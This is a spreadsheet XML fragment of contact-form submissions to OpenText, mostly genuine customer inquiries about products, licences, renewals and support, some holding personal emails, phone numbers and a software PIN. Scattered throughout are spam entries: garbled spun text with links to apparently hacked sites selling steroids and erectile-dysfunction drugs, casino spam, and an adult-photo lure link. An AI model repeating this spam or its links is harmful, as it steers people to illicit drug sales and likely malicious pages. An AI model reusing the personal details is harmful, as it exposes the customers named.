Abbiamo notato che talvolta i puntamenti non vengono aggiornati, e siccome non sappiamo come farlo in modo 'pulito', ci ritroviamo a dover modificare delle informazioni direttamente su DB. _x000D_
_x000D_
Prego di rispondermi tramite email se possibile. _x000D_
_x000D_
Buona giornata,_x000D_
Francesca</t>
  </si>
  <si>
    <t>MANUAL / SUPPORT</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.grttech.com/wp-includes/cancle.php?k=707-Methenolone-Enanthate-Steroid,Clomid-Australia-Price,Mesterolone-Ireland]Methenolone Enanthate Steroid[/url]_x000D_
 Unless you had been delivered best, you require a very little assistance here and there to check much better, in addition to, lower your expenses money and time carrying it out! With any luck ,, this information has presented you some valuable information on improving your physical appearance that may operate perfect for from your house. You will additionally possess a better picture of oneself plus a far more positive outlook how stunning you may be!The Ideal Way To Manage Your Individual Financial_x000D_
  [url=http://www.bateriasrjrecreio.com.br/images/backup.php?www=197]kigtropin reviews[/url]_x000D_
 Send related emails. Messages interrupt whatever your prospects are accomplishing, so send out them urgent, appropriate details such as "on the web putting in a bid begins in quarter-hour". Don't replicate the e-mail you possess presently directed. For those who have practically nothing, or nothing immediate to state don't give a text. Use email messages to deliver basic information._x000D_
  [url=http://www.valinox.ind.br/images/power.php?pear=721]Methenolone Steroid Profile[/url]_x000D_
 Take into account discovering sponsors for your personal blog site. Sponsors provide you with dollars for one of two reasons. They sometimes desire to retain the meaning you happen to be transmitting or these are benefitting by adding their own personal name or product while watching viewer. In any case, you might have charge of what your reader recognizes and that is definitely an advantage._x000D_
  [url=http://www.yourlifeinspired.org/wp-content/life.php?heat=1320-Testosterone-Implants-South-Africa-Methenolone-Oral-Tadalafil-Supplier.html]Testosterone Implants South Africa[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi ! _x000D_
The ever increasing unemployment level of is however at your alarming charge. Actually, normally there are usually lots because of factors defective a contractor simultaneously. Who doesn't need hard cash today? _x000D_
Definitely more research before granting up. That is when he brings about an publication about the situation and fantastic audio Mp3 format recording. Please view with your new local cops regarding fundraiser guidelines and additionally any expected filings just before you begin. Now, your site might wind up as interested to be know great deal more about how you can MySpace could well help your organization generate money, right? _x000D_
[url=http://kuorsaus.get-certifiednow.org/kuorsauksen-hoito-kotikonstein/]http://kuorsaus.get-certifiednow.org/kuorsauksen-hoito-kotikonstein/[/url]_x000D_
[url=http://il.oleggio2.org/20/]Ř·Ř±Ů‚ ŘŞŮŘ¨ŮŠŘ± Ř§Ů„Ů‚Ř¶ŮŠŘ¨[/url]_x000D_
 _x000D_
Right there are four main different sorts of manual marketing; content writing on top of that affiliate online marketing. Since certainly, there is a trustworthy minimum the era of to end up being able towards start doing the job on all the books. Successfully designing these great elements could the aerobic of in fact a "Webmaster." This existence is your true a job of art. Give up great reports that mighty helps your primary readers. _x000D_
&lt;a href="http://pt.oleggio2.org/ampliacao-do-penis/"&gt;http://pt.oleggio2.org/ampliacao-do-penis/&lt;/a&gt;_x000D_
 _x000D_
Now, we go within order to another topic, which is somewhat matching to abovementioned paragraphs. The completely nature associated with the eBook, particularly 'How To' constant makes these kinds of so prosperous. While everybody under the sun else are clutching gravely to his job, my spouse and i should you ought to be looking at how to generate money for the ourselves. You can remain among a person's first sorts of guests to choose build a money-making website around just about every single trend, or to create any kind of product that capitalizes found on the happe</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.rubygroup.vn/cache/client.php?hz=480-Clomiphene-Patient-Uk,Stanozolol-Side-Effects,Testosterone-Enanthate-Suppliers-Uk]Clomiphene Patient Uk[/url]_x000D_
 Steer clear of alcohol consumption in excess is sound advice for anyone at all ages. For all those more than 65 this means no more than 2 beverages for males or 1 consume for girls. Alcoholic beverages can respond negatively with many medications, and seniors are usually consuming one or more doctor prescribed medication._x000D_
  [url=http://www.sandiegoite.org/wp-includes/string.php?data=1480-Testosterone-Sustanon-Methandienone-Usa-Tadalafil-Powder-For-Sale/]Testosterone Sustanon[/url]_x000D_
 Make use of an avocado cover up to treat acne. Just mash and avocado with enough tepid to warm water to make a paste that one could spread very easily over your face. Enable the paste to stay onto the skin for about 5 minutes, then wash it well with tepid to warm water followed by amazing water. This may provide your skin with mild, all-natural, non-comedogenic hydration._x000D_
  [url=http://www.activecraft.com/img/away.php?get=Testosterone-Boosters-Reviews-Nandrolone-New-Zealand-Testosterone-Phenylpropionate-Vs-Propionate-1214/]Testosterone Boosters Reviews[/url]_x000D_
 Websites which get the most out of search engine optimization are hardly ever made with picture frames. Structures may be hassle-free for specific kinds of websites, however they are tough for search engines like google to directory appropriately. Finally, frameworked internet sites also have less articles than non-framed types, meaning framed web sites simply are unable to include as much look for-appropriate keywords and phrases._x000D_
  [url=http://www.mynoblecareer.com/wp-includes/backup.php?y=633-Methandienone-Nz-Methandienone-Usa-Tadalafil-Powder-For-Sale/]Methandienone Nz[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Excuse for that I interfere вЂ¦ To me this situation is familiar. It is possible to discuss. Write here or in PM._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">network Speeding </t>
  </si>
  <si>
    <t>I am writing to acquire some information on the Teleform software. My organization is gong to purchase the Teleform software. I would like to get a list of authorized dealers in Trinidad and Tobago and a listing of what is given when the software is purchased. For example when your product is sold does the customer get OCR and ICR or is there choice and reflected in price of the software? _x000D_
I just want to make sure as well  that were receive after service support on purchasing the software as well as all upgrade._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://seorussian.ru/]автоматизированное продвижение сайта[/url]  - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t>One of our clients use Open Text to send us files, we are having installation issues with installer package on Windows 10 and require assistance</t>
  </si>
  <si>
    <t xml:space="preserve">Bravo, remarkable idea_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">It agree, it is a remarkable phrase_x000D_
</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://playcasinoonline24.com/]online casino real money[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slot online&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>Competitve review of incumbent Vendor.  Searching for alternative for Electronic Records repositiory for the Lifecycle Managment of Aircraft parts</t>
  </si>
  <si>
    <t xml:space="preserve">Hi i was once upon the time a happy Eroom user. Do you offer today something similar. EROOM was fantastic tool._x000D_
 </t>
  </si>
  <si>
    <t>crubeg@contmy.info</t>
  </si>
  <si>
    <t>preciso de contato da empresa ou representante local (BHZ) para levantamento de requisitos</t>
  </si>
  <si>
    <t xml:space="preserve"> Please let me know if you can provision ICC online training asap and Price </t>
  </si>
  <si>
    <t>Would like contact information to send invitation to respond to tender</t>
  </si>
  <si>
    <t>Want a demo on your ECM product.</t>
  </si>
  <si>
    <t>does Vista Plus version 5.5.1 work with Windows 10 on an Amazon Work Station?  is there anything that needs to be set up for installation other than a license?</t>
  </si>
  <si>
    <t>Самые свежие новости Астрахани. Читайте об этом подробнее на сайте [url=https://astrakhan.net]astrakhan.net[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.langstart.com/fonts/state.php?id=279-KĂ¶pa-Viagra-I-Spanien,Biverkningar-Kamagra,Cialis-Apoteket]KĂ¶pa Viagra I Spanien[/url]_x000D_
 Discover to discover a equilibrium in between push and extreme caution. Hone what you can do to gauge the potential risks involved in opportunities that can come towards you, after which think about just how much you desire the prize. No pleasure will come with out some risk, yet not every single prize makes it worth while. Saving time as well as for what issues most for you._x000D_
  [url=http://jp.imelfin.com/administrator/includes/lib.php?use=24]jintropin 10 iu price[/url]_x000D_
 Get all interruptions and tasks taken care of prior to deciding to take a moment to examine. Doing this, you won't be tempted to become sidetracked by things that you might or should be doing alternatively. A lot of people realize that incomplete chores attract them from researching and offer them an reason to waste time. So get those activities taken care of initial so that you can give your learning undivided interest._x000D_
  [url=http://fitnesstechindia.net/img/backup.php?dog=192]Buy Clomiphene In New Zealand[/url]_x000D_
 Inhaling and exhaling exercises will help you handle concerned sensations. The straightforward respond of strong regular breaths within the deal with of demanding or irregular scenarios can bring much needed oxygen towards the human brain and alleviate these sensations. Operated respiration will enable you to pinpoint the job you are confronting and permit you to proceed calmly._x000D_
  [url=http://www.nepsltd.co.uk/about/list.php?a=0-Buy-Cialis-Germany,Kamagra-Bestellen-In-Deutschland,Viagra-Rezeptfrei-Kaufen-Hamburg]Buy Cialis Germany[/url]_x000D_
</t>
  </si>
  <si>
    <t>Please grant online access for accessing all resources related to SUIDs 99405-12198 &amp; 80612-12185.  We have an existing OpenText Professional Services engagement and need to download some software in order to work with OpenText engineer to perform installations.  Thank you._x000D_
o	Download the RightFax software prior to installation. It’s a fairly large download, so we’ll want to make sure we have it available prior to the beginning of the installation. If you don’t have a login for our Knowledge Center, you can request one on the login page for the KC. You will need to provide your SUID (system ID) which is: 99405-12198 &amp; 80612-12185. _x000D_
	RightFax 16 Enhancement Pack 2 _x000D_
	RightFax 16 Enhancement Pack 2 Service Release 2 _x000D_
_x000D_
_x000D_
_x000D_
Orphy</t>
  </si>
  <si>
    <t>Dear Sir_x000D_
Please give me Information about bravareader Desktop Version who i can buy for private use. I have the Trial Version but it gets soon expired and i get the info now to upgrade to the licenced Version "Brava Desktop Tx". I want to read the CAD files Format wm3 and wm5. It`s not for Business use ! -only for 1 seat privat use and should not be expensive. Please give me advice what could i buy._x000D_
_x000D_
friendly Roland Walter</t>
  </si>
  <si>
    <t>Need a quick connect, product demo of CCM offerings and Exstream in specific</t>
  </si>
  <si>
    <t>Прежде всего, ознакомьтесь с документами. У застройщика должна быть лицензия на ведение строительных работ, разрешение на строительство данного объекта и документы на ввод интересующего вас дома в эксплуатацию. Подробнее читайте на сайте [url=http://sovet-sadovody.ru]sovet-sadovody.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">test test test </t>
  </si>
  <si>
    <t>I would like a quote for 2 exceed version 14 or greater licenses.</t>
  </si>
  <si>
    <t>cost and can excel or pdf's be modified?</t>
  </si>
  <si>
    <t xml:space="preserve">Gostaria de encaminhar uma apresentação de nossa empresa, que presta serviços na área de eventos e assim poder concorrer a realização de seus eventos futuros. Quem seria a pessoa responsável por essa contratação e qual o endereço de e-mail?_x000D_
_x000D_
Atenciosamente,_x000D_
_x000D_
Adriana </t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a new integration partner to manage our subscriber communications. We currently trigger transnational emails to subscribers based different events/criterion. We are looking to expand our methods of communication. </t>
  </si>
  <si>
    <t>Our company, Tasiast Mauritanie Limited S.A. (Kinross Gold) is looking to send out an RFI in the next few weeks for the implementation of a Business Process Management System aimed at streamlining our logistics/customs process . I would like to have the contact details (email address) of the relevant party within your company who should be receiving the RFI documentation.</t>
  </si>
  <si>
    <t>I'm trying to find out what is included in the following product suite: SAP Ext. ECM by Open Text</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am an employee of the government of Canada and i am interested in the following course 2-0113 Content Server Workflow Design v16.2 offered at content world. I would like information on the pricing. Do you offer any deal for workshop and conference for the government of Canada. Does the cost of the course cover the conference. could you provide me with an estimate for both the course and the conference. _x000D_
thanks </t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
GDPR. Our third party supplier uses GXS on our behalf for movement of EDI messages and I'm concerned that as GXS has data centres in the US we may not be GDPR compliant if our messaging is held in one of those data centres. Can you advise, please, and, if possible, supply a document detailing the position so I am able to present to my business._x000D_
_x000D_
Thanks in anticipation._x000D_
_x000D_
David Hall</t>
  </si>
  <si>
    <t>I want to renew my brava reader</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Nous sommes ENEO Cameroon, nous opérons dans les domaines de la production et de la distribution de l’énergie électrique au Cameroun. Nous souhaitons acquérir une solution ECM et dans ce cadre le cadre d’un appel d’offre. Le périmètre défini allant de l’étude à la mise en œuvre de la solution à partir d’un cahier des charges fonctionnel._x000D_
_x000D_
C’est dans ce cadre que nous échangeons avec les acteurs majeurs du secteur pouvant nous accompagner dans notre transformation. Au cas votre compagnie serait intéressée par ce challenge, nous sommes disposés à échanger avec vous que vous preniez la mesure de nos attendus de ce projet._x000D_
_x000D_
Cordialement_x000D_
</t>
  </si>
  <si>
    <t>One of our clients has published a RFP solicitation for "Hummingbird Exceed" licensing. I understand that program has changed names. I am trying to figure out who your Canadian distribution partners may be and if we are authorized to sell this product. Please advise ASAP. Thank-you!</t>
  </si>
  <si>
    <t>Please check whether UBS has support contract with OpenText or not. If yes, please direct me to the POC from UBS for linking my profile to the UBS.</t>
  </si>
  <si>
    <t>Состояние окружающей нас среды во многом зависит от правильного использования природных ресурсов, которые даются человеку. Это касается и строительной деятельности. Подробнее об этом читайте на сайте [url=http://beton-cement-ru.ru]beton-cement-ru.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
A client of ours has Teamsite and Livelink deployed, and has asked to find a solution to integrate these with a third-party application. We would only require a developer setup of Livelink and Teamsite for this. Does OpenText provide developer/testing setup solutions?_x000D_
_x000D_
Best Regards,_x000D_
Kaarel Hanson_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are a current open text customer.  We use the product for our national employees.  We are now looking for a solution for our retail locations across Canada.  roughly 800 + retail locations.  The solution needs to be managed at each location.</t>
  </si>
  <si>
    <t>We're interested in learning more about your solutions for archived data storage and retrieval, specifically in accordance with SEC Rule 17a-4</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are trying to access to the support, but we cannot access: knowledge center..._x000D_
_x000D_
Our end user company is: 10143149 - SABADELL INFORMATION SYS._x000D_
_x000D_
Please our client  (SABADELL INFORMATION SYTEMS) have just re-newed the licences  but they have not received any user/password._x000D_
_x000D_
We would need to fix this to access to your support._x000D_
_x000D_
The responsable person of Sabadell is: Juan Hevia (heviaj@sabis.tech). _x000D_
_x000D_
Regards._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We would like to pay our outstanding invoice 9000447647 by Visa credit card. Are there any fees or dollar limits to use a credit card for payment? _x000D_
Thanks</t>
  </si>
  <si>
    <t>Kanagawa</t>
  </si>
  <si>
    <t>Our company (Toysrus Japan) is using EDI400 (TrustedLink EDI ?). Current version is 6.02.0._x000D_
We will upgrade AS400 to V7R3 from V7R1. We heared that this version of EDI400 is not run on OS V7R3, and we will need to upgrade EDI400 to version 6.3.2. is it corect ?_x000D_
If it is correct, we want to know the method (How to obtain software, etc)._x000D_
So far, we have contracted this tool via Toysrus' Global department member (member name is Ford, St John). So I do not know the concrete upgrade procedure. _x000D_
And I do not know how to contract specifically with you. Can we contact you directly and request for upgrade?_x000D_
Please provide your support.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir, _x000D_
_x000D_
We are about to launch an RFI for Component Content Management Systems (CCMS) and we are considering to include Opentext in this event . _x000D_
_x000D_
Would you please advise the contact person and his contact details to be invited from Opentext. _x000D_
Thank You._x000D_
Abdessalem _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking for a BPM solution.  In my past I worked with Metastorm Ework an I would love a similar BPM solution here at The First Judicial District of Pennsylvania._x000D_
_x000D_
Thanks you,_x000D_
-Trip Mills</t>
  </si>
  <si>
    <t xml:space="preserve">Buongiorno, vorremmo approfondire la soluzione di OpenText Documentum XCP per la gestione dei workflow documentali e come front-end per il nostro documentale ( Documentum 7.1)._x000D_
Sarebbe possibile organizzare una demo/incontro di approfondimento? _x000D_
_x000D_
Grazie._x000D_
Buona giornata._x000D_
Federico Oliva._x000D_
</t>
  </si>
  <si>
    <t>To whom it may concern:_x000D_
_x000D_
I am using Brava Enterprise 7.1.49. I am encountering a problem that clicking the Publish button has no response. Your provision of trouble-shooting instructions will be highly appreciated._x000D_
_x000D_
Sincerely,_x000D_
Kevin Wang</t>
  </si>
  <si>
    <t>I have already confirmed a second time my registration to My Support and received following confirmation:_x000D_
Congratulations! You now have access to the Online Support Resources available through My Support._x000D_
But as soon as I want to open My Support I get following:_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
What can I do?_x000D_
Thanks and best regards_x000D_
Lajos</t>
  </si>
  <si>
    <t>Rate my nаkеd photos + , my blоg _x000D_
 _x000D_
[url=https://bit.ly/2reqT6Z?6406][img]https://pp.userapi.com/c6026/v6026323/16f31/Mj6XVmL_Yuo.jpg[/img][/url]</t>
  </si>
  <si>
    <t>Ich bitte um Berechtigungserteilung für das angelegte Konto analog zu Vincent Brechbühl - Vincent.Brechbuehl@BIT.admin.ch. Merci, VG Hartmann</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://playcasinoonline24.com/]online slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slots online&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>hello we are looking for a fax solutions for a big account._x000D_
I wanted to test your fax solution.</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://playcasinoonline24.com/]casino slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slot game&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://playcasinoonline24.com/]casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino real money&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t xml:space="preserve">renewal </t>
  </si>
  <si>
    <t>We are using right fax solution in our premises &amp; Looking for support renewal.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.swineroc.com.tw/css/list.php?a=114-Kamagra-Bijwerkingen,Vrouwen-Viagra-Zembla,Kamagra-Ervaringen]Kamagra Bijwerkingen[/url]_x000D_
 Moving outside the house and walking is the best way to help out the skin preventing acne breakouts. Direct sunlight enables you to generate vitamin supplement D in the body, and this nutritional is actually a key component in terms of experiencing healthier skin area. And healthful skin area is not as likely at risk of acne. Using a walk exterior is additionally helpful in decreasing pressure, which can be yet another factor of zits vulnerable skin._x000D_
  [url=http://www.candientuhoanggia.com/wp-content/themes/achieve.php?ou=824-Oxandrolone-Anavar-Oxymetholone-Powder-For-Sale-Testosterone-Powder-Source/]Oxandrolone Anavar[/url]_x000D_
 When your dog is working through bothersome conduct, be careful about that you deliver him for boarding or daycare. A lot of boarding and childcare facilities usually do not follow through on specific dog's education programs, so make sure that you place your puppy a place where by he is certain to get the eye he requirements. Pet-sitters typically supply person treatment that reinforces habits. Ask what ever facility or sitter you're considering about how they handle a scenario like your dog's._x000D_
  [url=http://www.candientuhoanggia.com/wp-content/themes/achieve.php?ou=300-Buy-Trenbolone-Online-Sildenafil-Citrate-Powder-Suppliers-Trenbolone-Acetate-Benefits/]Buy Trenbolone Online[/url]_x000D_
 The type of under garments you dress in takes on a serious part on if you build a yeast infections. On the one hand, pure cotton and silky underwear process dampness, maintaining your vaginal location free of moisture and preventing infections from forming. Alternatively, artificial fibres, like nylon, take humidity near to your epidermis, improving your chances of a yeast infection._x000D_
  [url=http://www.efrances.org/sitemap/images.php?white=1373]Testosterone Powder[/url]_x000D_
</t>
  </si>
  <si>
    <t>We had purchase for one of our customer a RightFax Business suite v.10 (2-line, 50-users).  We would like to upgrade to the latest version with the following option (2-lines, 25-users) and (2-lines, 50-users).  Please provide me with dealer pricing for upgrade and new purchase.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.mynoblecareer.com/wp-includes/backup.php?y=1256-Testosterone-Cypionate-Wholesale-Stanozolol-Side-Effects-Testosterone-Enanthate-Suppliers-Uk/]Testosterone Cypionate Wholesale[/url]_x000D_
 One method to keep allergy symptoms in order would be to open up microsoft windows when in a position, but in addition to find out when and also hardwearing . microsoft windows closed. This is important since be preserving your windows open, you will be releasing your property to much more airborne dirt and dust, plant pollen along with other allergens that might otherwise have been held out. The days throughout the day which have the best pollen matter are between 10 A.M. and three P.M._x000D_
  [url=http://www.consultelhotelaria.com.br/img/cache.php?marin=965]Primobolan Stack[/url]_x000D_
 Don't allow your despression symptoms affect your regular life. Equally as those who are having difficulty with physical conditions shouldn't end almost everything, neither of the two in the event you end your daily life simply because you suffer from this issue. Get ways to motivate yourself to get out of the home and you might even find the your despression symptoms greatly decreases._x000D_
  [url=http://www.pinahidrolik.com/images/cancle.php?jk=103-Cialis-Originale-Farmacia-On-Line-Levitra-Generico-Funziona-Generico-Viagra-Doc/]Cialis Originale Farmacia On Line[/url]_x000D_
 With a little luck this article has presented you plenty of tips on avoiding and dealing with infections that will help you with your own situation. Candida albicans affect numerous girls, so don't sense alone. You've got to arm oneself with reliable information and get speedy activity against infections and all of the aggravating signs and symptoms which come with them.Arthitis Advice That All People Should Read through_x000D_
  [url=http://www.sejeunes.com/modules/heart.php?format=1665-Wholesale-Testosterone-Injections,Anavar-Oxandrolone-For-Sale-Uk,Methandienone-Price-In-Usa]Wholesale Testosterone Injections[/url]_x000D_
</t>
  </si>
  <si>
    <t>I am interested in applying in your company for internship. I hope you can give me an email where I can send my curriculum vitae. Thank you.</t>
  </si>
  <si>
    <t>We are currently looking for a platform that can address our DMS/ECM requirements.</t>
  </si>
  <si>
    <t xml:space="preserve">I recently joined the OTMM Cloud group as Sr Manager and would like to take a Power User Media Manager course.  I am checking to see if I enrolled successfully in the following_x000D_
May 07, 2018  On-site    English  Virtual Classroom - North America 895.00  Add to Cart _x000D_
Thanks! </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for pricing, I have a client that is purchasing a company that is currently using your product and we will be needing to transition them to a new license/ instance. _x000D_
</t>
  </si>
  <si>
    <t>I am receiving calls from your company which I wish to stop, as I have not contacted you nor signed up for any of your services. Thank You for your attention in this matter.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I have two people I would like to register for a class, but I need to know if we can be invoiced for the training since we are a state agency and can not do a PO or payment prior to the course._x000D_
Thank you,_x000D_
Jennifer</t>
  </si>
  <si>
    <t>Good Day,_x000D_
_x000D_
I'm doing an initial investigation for the AGA SP Connector. National Defence currently has GCDocs licenses and will have SharePoint 2016 on-premise soon. What information do you require to give a quote on the AGA SharePoint connector to GCDocs? _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Brad</t>
  </si>
  <si>
    <t>slots online _x000D_
[url=http://playcasinoonline24.com/]casino games real money[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino slots&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>Need to be able to try and compare Brava! to Mryiad which we have been using for years. Need to be able to open any cad file sent to us!</t>
  </si>
  <si>
    <t>Seeking information on a solution for enterprise-wide Policy Management</t>
  </si>
  <si>
    <t xml:space="preserve">En date du 28 avril 2018, la Ville de Trois-Rivières a publié sur le site du SEAO, un appel d’offres concernant l’acquisition d’un logiciel GID. _x000D_
_x000D_
Vous pouvez  vous procurer les documents sur le site du SEAO._x000D_
_x000D_
Merci_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted to inquire about licenses for Hummingbird xWindows Suite. Are you a reseller of the product?  </t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://playcasinoonline24.com/]casinos online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;kasino&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
i'm not able to download my software._x000D_
3 times I have confirm the registration._x000D_
What's wrong. ?_x000D_
I have a contract for this._x000D_
_x000D_
Thanks with regards,_x000D_
Michael Krohn</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon_x000D_
_x000D_
We are requesting a renewal quote for the software listed below:_x000D_
_x000D_
_x000D_
Renewal Notice_x000D_
Date: 4/16/18_x000D_
Reference Number: RC284069_x000D_
Contract Number: 0012253359_x000D_
Maintenance Term Start Date: 8/1/18_x000D_
Maintenance Term Expiration Date: 7/31/19_x000D_
Quote Expires: 7/31/18_x000D_
Payment Terms: Net 30_x000D_
Previous PO Number: 70-AX687-D_x000D_
_x000D_
Ship To:_x000D_
Bureau of Alcohol, Tobacco,, Firearms &amp; Explosives (ATF) -_x000D_
10049812_x000D_
99 New York Ave NE_x000D_
Washington, DC, 20002-3325_x000D_
United States_x000D_
_x000D_
End User Information:_x000D_
Bureau of Alcohol, Tobacco,, Firearms &amp; Explosives (ATF) -_x000D_
EU0175877_x000D_
99 New York Ave NE_x000D_
Washington, DC, 20002-3325_x000D_
United States_x000D_
_x000D_
QTY PRODUCT AMOUNT_x000D_
1,800 Host Explorer Single License (Electronic) Maintenance 1000027595 40,140.00_x000D_
08/01/18 to 07/31/19_x000D_
Unique #: V0706-14001_x000D_
(S-HBMPI776101M_M)_x000D_
_x000D_
1 Connectivity Protect Anytime 1000027360 6,268.77_x000D_
08/01/18 to 07/31/19_x000D_
Unique #: V0706-14001_x000D_
_x000D_
(S-GN-24X7RESTORE)_x000D_
20 Exceed Single License (Electronic) Maintenance 1000025395 1,493.40_x000D_
08/01/18 to 07/31/19_x000D_
Unique #: V0706-14001_x000D_
_x000D_
(S-EXMPI550101M_M)_x000D_
15 Secure Shell Single License (Electronic) Maintenance 1000034963 158.40_x000D_
08/01/18 to 07/31/19_x000D_
Unique #: V0706-14001_x000D_
_x000D_
(S-SPMPI570101M_M)_x000D_
_x000D_
_x000D_
Thank you for your assistance_x000D_
</t>
  </si>
  <si>
    <t>Need technical support and renew support contract</t>
  </si>
  <si>
    <t>Verification of employment for Michael T Smith</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://playcasinoonline24.com/]online casino slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>Does Black Knight Financial Services have support. It looks like either a support invoice is due . If this is the case please send me a copy of the invoice.</t>
  </si>
  <si>
    <t>Faxing Solutions.</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://playcasinoonline24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;cassino&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking at optical vendors to replace our current solution.   </t>
  </si>
  <si>
    <t>Dear Sir´s, i am searching for a current list or URL  of scanners supported by Cloud Capture Tool Kit. I am working in Kodak Alaris to support scanner integrations an would like to have a contact in OpenText and an adrees for integration questions we and our common endcustomers have._x000D_
Thanks &amp; regards_x000D_
B. Pfeifer</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot find the Accounts on the top menu, and I cannot log into the support._x000D_
_x000D_
Product Description: Brava! Desktop TX_x000D_
Product Version: 16.4_x000D_
_x000D_
Software ID: 9B6DE5CD3FAF46D4B41B2D59DDA8B6A3_x000D_
Software PIN: IGC463035_x000D_
 _x000D_
•	Obtain your license key_x000D_
o	Please visit: http://support.opentextcom and follow the below steps:_x000D_
	Click on Accounts on the Top Menu_x000D_
	Select Activations/Keys_x000D_
	On the Product Activation Page Search for your IGC PIN_x000D_
	Click on the Produce License Key icon_x000D_
	Enter Required information to generate Key_x000D_
	Click Submit_x000D_
	Click Download File to obtain your License File_x000D_
	Open zip file and save IGCKey.lic to a retrievable location (i.e. Desktop)._x000D_
</t>
  </si>
  <si>
    <t>I am interested in pursuing tarining on Open Text which will include day to day administrative role, configuration. Please let send me the course bronchure and fees.</t>
  </si>
  <si>
    <t xml:space="preserve">We use XML transformation product and have a developer license on work station L-H5CG6435L6Y. We like to transfer this license to a new work station L-H5CG5100W6Q .Would you please  provide us a new license file for L- H5CG5100W6Q. Thank you._x000D_
_x000D_
Guochun _x000D_
617-526-7923_x000D_
gmo@plymouthrock.com_x000D_
</t>
  </si>
  <si>
    <t>I need a proper receipt for the payment reference number AG3C1C5D02FA.  Printing the page as your website suggests gives me three pages of crap.</t>
  </si>
  <si>
    <t xml:space="preserve">Not sure if we have a support/service contact to use the portal for support. </t>
  </si>
  <si>
    <t>We have an EDI account with GXS. As of this morning, we are unable to access our mailbox on support(dot)gxsolc(dot)com portal. Any help is greatly appreciated.</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
I am writing you in regard to a web-application-tool that we currently use, but want to update. _x000D_
We currently use the application "Compass" in order to provide Software for our customers, that was developed and implemented by your company. Since "Compass" is already in use for almost 20 years and due to other reasons, we are looking for a replacement._x000D_
If possible it should be a cloud solution and should comply to the German C5 Standard. We want to provide to our customers a platform that is user-friendly. We also want to quickly manage files that we upload, with a drag and drop option for example. We are used to browse every file manually, which is old fashioned and consumes a lot of time._x000D_
Our costumers are supposed to get different access responsibilities to the database, differing on what kind of costumers they are. Also it should not be an Open Filesharing Solution, like dropbox for example, since each costumer should remain anonymous one to each other. _x000D_
I would be glad to provide more information on demand._x000D_
I wanted to check first, if you might have a solution to this kind of problem._x000D_
_x000D_
Please also include my colleagues as Cc when responding: Daniel Bumke (daniel.bumke@motorolasolutions.com) and Frederic Charpentier (frederic.charpentier@motorolasolutions.com)._x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Kind Regards,_x000D_
Alexej Guija Artmann</t>
  </si>
  <si>
    <t>Clarifications on e-mail attachment, SAP automation and reading stamped data</t>
  </si>
  <si>
    <t>Is there a status column we can use in Rightfax that indicates a fax has been reviewed completely by a radiologist?</t>
  </si>
  <si>
    <t>slots online _x000D_
[url=http://playcasinoonline24.com/]slots online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>Need to clarify doubts on OpenText tool to be used for e-mail attachment processing, SAP automation and reading stamped data.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in Email list of Hortonworks Users across US?_x000D_
_x000D_
